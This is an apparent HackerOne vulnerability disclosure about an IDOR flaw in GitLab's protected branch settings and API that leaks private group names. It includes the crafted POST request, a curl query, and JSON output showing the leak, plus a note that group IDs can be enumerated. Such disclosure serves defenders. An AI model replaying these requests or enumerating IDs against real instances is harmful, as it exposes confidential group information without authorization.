Private group names are disclosed through protected branch settings and API
Link: https://hackerone.com/reports/418011
By: @jobert
Details: The protected branch settings page and respective API endpoints are vulnerable to an Insecure Direct Object Reference (IDOR) vulnerability that discloses private group names the current user is unauthorized to see.
Steps to reproduce
- make sure that a group exists that the current user does not have access to, let's assume that this private group was assigned ID
1
- sign in as a user who is capable of creating a new project, e.g. as user
root
- create a project, e.g. called
project
- send the following request to the
Projects::ProtectedBranchesController#create
endpoint:
POST /root/project/protected_branches HTTP/1.1
Host: gitlab-instance
...
{"authenticity_token":"<token>","protected_branch":{"name":"master","merge_access_levels_attributes":[{"group_id":2}],"push_access_levels_attributes":[{"group_id":2}]}}
- in the request above, the
group_id
parameters (for bothpush_access
andmerge_access
, and perhaps also forunprotect_access
), are vulnerable to an IDOR vulnerability - change the
group_id
to the group that you want to obtain the name of - in the protected branch settings page, it'll now look like this:
- now query the
protected_branches
through the API:
$ curl -X GET -H 'Private-Token: <token>' http://gitlab-instance/api/v4/projects/1/protected_branches | jq
[
{
"name": "master",
"push_access_levels": [
{
"access_level": 40,
"access_level_description": "secret",
"user_id": null,
"group_id": 1
}
],
"merge_access_levels": [
{
"access_level": 40,
"access_level_description": "secret",
"user_id": null,
"group_id": 1
}
],
"unprotect_access_levels": []
}
]
- as can be seen above, the
access_level_description
discloses the private group's name
Impact
Private group names are considered to be confidential information. An attacker can easily enumerate over the IDs, as they are auto-incremental. This feature is only available on GL EE, which makes this issue exploitable on gitlab.com's Free tier.